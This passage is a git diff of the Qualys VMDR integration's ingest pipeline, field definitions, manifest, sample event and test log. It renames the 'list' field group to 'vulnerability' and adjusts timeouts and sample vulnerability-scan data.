(!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.first.reopened_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_REOPENED_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime formats: - ISO8601 on_failure: @@ -1354,161 +1260,138 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: - field: qualys_vmdr.asset_host_detection.list.SSL - tag: rename_qualys_vmdr_asset_host_detection_list_SSL_2 - target_field: qualys_vmdr.asset_host_detection.list.ssl + field: qualys_vmdr.asset_host_detection.vulnerability.SSL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SSL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.ssl ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.TYPE - tag: rename_qualys_vmdr_asset_host_detection_list_TYPE_2 - target_field: qualys_vmdr.asset_host_detection.list.type + field: qualys_vmdr.asset_host_detection.vulnerability.TYPE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_TYPE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.type ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.STATUS - tag: rename_qualys_vmdr_asset_host_detection_list_STATUS_2 - target_field: qualys_vmdr.asset_host_detection.list.status + field: qualys_vmdr.asset_host_detection.vulnerability.STATUS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_STATUS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.status ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.RESULTS - tag: rename_qualys_vmdr_asset_host_detection_list_RESULTS_2 - target_field: qualys_vmdr.asset_host_detection.list.results + field: qualys_vmdr.asset_host_detection.vulnerability.RESULTS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_RESULTS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.results ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QID - tag: rename_qualys_vmdr_asset_host_detection_list_QID_2 - target_field: qualys_vmdr.asset_host_detection.list.qid + field: qualys_vmdr.asset_host_detection.vulnerability.QID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QID_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qid ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.PROTOCOL - tag: rename_qualys_vmdr_asset_host_detection_list_PROTOCOL_2 - target_field: qualys_vmdr.asset_host_detection.list.protocol + field: qualys_vmdr.asset_host_detection.vulnerability.PROTOCOL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_PROTOCOL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.protocol ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.FQDN - tag: rename_qualys_vmdr_asset_host_detection_list_FQDN_2 - target_field: qualys_vmdr.asset_host_detection.list.fqdn + field: qualys_vmdr.asset_host_detection.vulnerability.FQDN + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_FQDN_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.fqdn ignore_missing: true - append: field: related.hosts - tag: append_qualys_vmdr_asset_host_detection_list_fqdn_into_related_hosts_2 - value: '{{{qualys_vmdr.asset_host_detection.list.fqdn}}}' + tag: append_qualys_vmdr_asset_host_detection_vulnerability_fqdn_into_related_hosts_2 + value: '{{{qualys_vmdr.asset_host_detection.vulnerability.fqdn}}}' allow_duplicates: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.fqdn != null + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.fqdn != null - rename: - field: qualys_vmdr.asset_host_detection.list.INSTANCE - tag: rename_qualys_vmdr_asset_host_detection_list_INSTANCE_2 - target_field: qualys_vmdr.asset_host_detection.list.instance + field: qualys_vmdr.asset_host_detection.vulnerability.INSTANCE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_INSTANCE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.instance ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_SERVICE_2 - target_field: qualys_vmdr.asset_host_detection.list.service + field: qualys_vmdr.asset_host_detection.vulnerability.SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SERVICE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.service ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_RUNNING_KERNEL - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_KERNEL_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.running.kernel + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_KERNEL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_KERNEL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_RUNNING_SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_SERVICE_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.running.service + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_SERVICE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.service ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_EXPLOITABLE_CONFIG - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_EXPLOITABLE_CONFIG_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.exploitable_config + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_EXPLOITABLE_CONFIG + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_EXPLOITABLE_CONFIG_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.ASSET_CVE - tag: rename_qualys_vmdr_asset_host_detection_list_ASSET_CVE_2 - target_field: qualys_vmdr.asset_host_detection.list.asset_cve + field: qualys_vmdr.asset_host_detection.vulnerability.ASSET_CVE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_ASSET_CVE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.asset_cve ignore_missing: true - set: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED - tag: set_qualys_vmdr_asset_host_detection_list_IS_DISABLED_true + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_true value: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '1' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '1' - set: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED - tag: set_qualys_vmdr_asset_host_detection_list_IS_DISABLED_false + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_false value: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '0' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '0' - convert: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED tag: convert_IS_DISABLED_to_boolean - target_field: qualys_vmdr.asset_host_detection.list.is_disabled + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_disabled type: boolean ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED - tag: set_qualys_vmdr_asset_host_detection_list_IS_IGNORED_true + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_true value: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '1' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '1' - set: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED - tag: set_qualys_vmdr_asset_host_detection_list_IS_IGNORED_false + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_false value: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '0' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '0' - convert: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED tag: convert_IS_IGNORED_to_boolean - target_field: qualys_vmdr.asset_host_detection.list.is_ignored + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_ignored type: boolean ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_remove_ingest_value_fields - processor: - remove: - field: - - _ingest._value.LAST_UPDATE_DATETIME - - _ingest._value.LAST_FIXED_DATETIME - - _ingest._value.LAST_TEST_DATETIME - - _ingest._value.LAST_PROCESSED_DATETIME - - _ingest._value.FIRST_FOUND_DATETIME - - _ingest._value.FIRST_REOPENED_DATETIME - - _ingest._value.LAST_FOUND_DATETIME - - _ingest._value.LAST_REOPENED_DATETIME - - _ingest._value.SEVERITY - - _ingest._value.TIMES_FOUND - - _ingest._value.TIMES_REOPENED - - _ingest._value.PORT - - _ingest._value.QDS_FACTORS - - _ingest._value.IS_DISABLED - - _ingest._value.IS_IGNORED - tag: remove_qualys_vmdr_asset_host_detection_list_fields - ignore_missing: true - remove: tag: remove_json field: - json - message - - qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME - - qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME - - qualys_vmdr.asset_host_detection.list.IS_DISABLED - - qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME - - qualys_vmdr.asset_host_detection.list.PORT - - qualys_vmdr.asset_host_detection.list.SEVERITY - - qualys_vmdr.asset_host_detection.list.TIMES_FOUND - - qualys_vmdr.asset_host_detection.list.TIMES_REOPENED - - qualys_vmdr.asset_host_detection.list.IS_IGNORED + - qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + - qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.PORT + - qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS + - qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + - qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + - qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + - qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED - qualys_vmdr.asset_host_detection.cloud.provider.tags.cloud_tag.LAST_SUCCESS_DATE - qualys_vmdr.asset_host_detection.metadata.ec2.attribute.LAST_ERROR_DATE - qualys_vmdr.asset_host_detection.metadata.ec2.attribute.LAST_SUCCESS_DATE diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml index cffc1054343..3f06756a3f4 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml @@ -70,7 +70,7 @@ type: date - name: scanned_duration type: long - - name: list + - name: vulnerability type: group fields: - name: affect @@ -156,6 +156,8 @@ type: long - name: type type: keyword + - name: unique_vuln_id + type: keyword - name: metadata type: group fields: diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml index 7d0fe3a7d1b..df64cca6496 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml @@ -15,7 +15,9 @@ streams: - name: interval type: text title: Interval - description: "Interval between two REST API calls. User can choose interval as per their plan mentioned in [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s." + description: >- + Interval between two REST API calls. User can choose interval as per their plan mentioned in + [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s. default: 4h multi: false required: true @@ -23,7 +25,9 @@ streams: - name: batch_size type: integer title: Batch Size - description: "Batch size for the response of the Qualys Server API. This parameter specifies the truncation limit for the response. Specify 0 for no truncation limit." + description: >- + Batch size for the response of the Qualys Server API. This parameter specifies the truncation limit for the response. + Specify 0 for no truncation limit. default: 1000 multi: false required: true @@ -31,15 +35,19 @@ streams: - name: http_client_timeout type: text title: HTTP Client Timeout - description: "Duration before declaring that the HTTP client connection has timed out. Supported time units are ns, us, ms, s, m, h." + description: >- + Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when + retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h. Requests may take + significant time, so short timeouts are not recommended. multi: false required: true show_user: false - default: 30s + default: 10m - name: input_parameters type: text title: Input Parameters - description: "Input Parameters for the URL. param1=value¶m2=value¶m3=....*" + description: >- + Input Parameters for the URL. param1=value¶m2=value¶m3=....* multi: false required: false show_user: true diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json b/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json index 70e16c7ac84..af0c7da8c11 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-10-25T08:52:23.474Z", + "@timestamp": "2024-03-11T21:06:28.277Z", "agent": { - "ephemeral_id": "8365cc1b-0570-46a3-986b-eb86f03344d2", - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "ephemeral_id": "798665d1-a592-4f07-8517-f7bdcdbda09f", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.asset_host_detection", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -26,7 +26,7 @@ "host" ], "dataset": "qualys_vmdr.asset_host_detection", - "ingested": "2023-10-25T08:52:26Z", + "ingested": "2024-03-11T21:06:40Z", "kind": "alert", "type": [ "info" @@ -53,30 +53,58 @@ "scanned_duration": 1113 } }, - "list": [ - { - "first": { - "found_datetime": "2023-06-28T06:04:26.000Z" + "tracking_method": "IP", + "vulnerability": { + "affect": { + "running": { + "kernel": "0" + } + }, + "first": { + "found_datetime": "2021-02-05T04:50:45.000Z" + }, + "is_disabled": false, + "is_ignored": false, + "last": { + "fixed_datetime": "2022-12-14T06:52:57.000Z", + "found_datetime": "2024-03-08T20:15:41.000Z", + "processed_datetime": "2024-03-08T20:15:41.000Z", + "test_datetime": "2024-03-08T20:15:41.000Z", + "update_datetime": "2024-03-08T20:15:41.000Z" + }, + "qds": { + "severity": "LOW", + "text": "35" + }, + "qds_factors": [ + { + "name": "CVSS", + "text": "7.7" }, - "is_disabled": false, - "is_ignored": false, - "last": { - "found_datetime": "2023-07-03T06:23:47.000Z", - "processed_datetime": "2023-07-03T06:25:17.000Z", - "test_datetime": "2023-07-03T06:23:47.000Z", - "update_datetime": "2023-07-03T06:25:17.000Z" + { + "name": "CVSS_version", + "text": "v3.x" }, - "qid": "91681", - "severity": 5, - "ssl": "0", - "status": "Active", - "times": { - "found": 11 + { + "name": "epss", + "text": "0.00232" }, - "type": "Confirmed" - } - ], - "tracking_method": "IP" + { + "name": "CVSS_vector", + "text": "AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "qid": "197595", + "results": "Package Installed Version Required Version\nlinux-cloud-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-tools-4.4.0 1074_4.4.0-1074.84 1092\nlinux-aws-headers-4.4.0 1074_4.15.0-1126.135 1092\nlinux-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-cloud-tools-4.4.0 1074_4.4.0-1074.84 1092", + "severity": 3, + "ssl": "0", + "status": "Active", + "times": { + "found": 5393 + }, + "type": "Confirmed", + "unique_vuln_id": "5555555555" + } } }, "related": { @@ -92,4 +120,4 @@ "forwarded", "qualys_vmdr-asset_host_detection" ] -} +} \ No newline at end of file diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log index c77a3f15652..dced2a7948e 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log +++ b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log @@ -1,3 +1,3 @@ -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": {"#text": "High_Lateral_Movement","id": "4"}},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "5","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}},"TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": {"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."}},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, 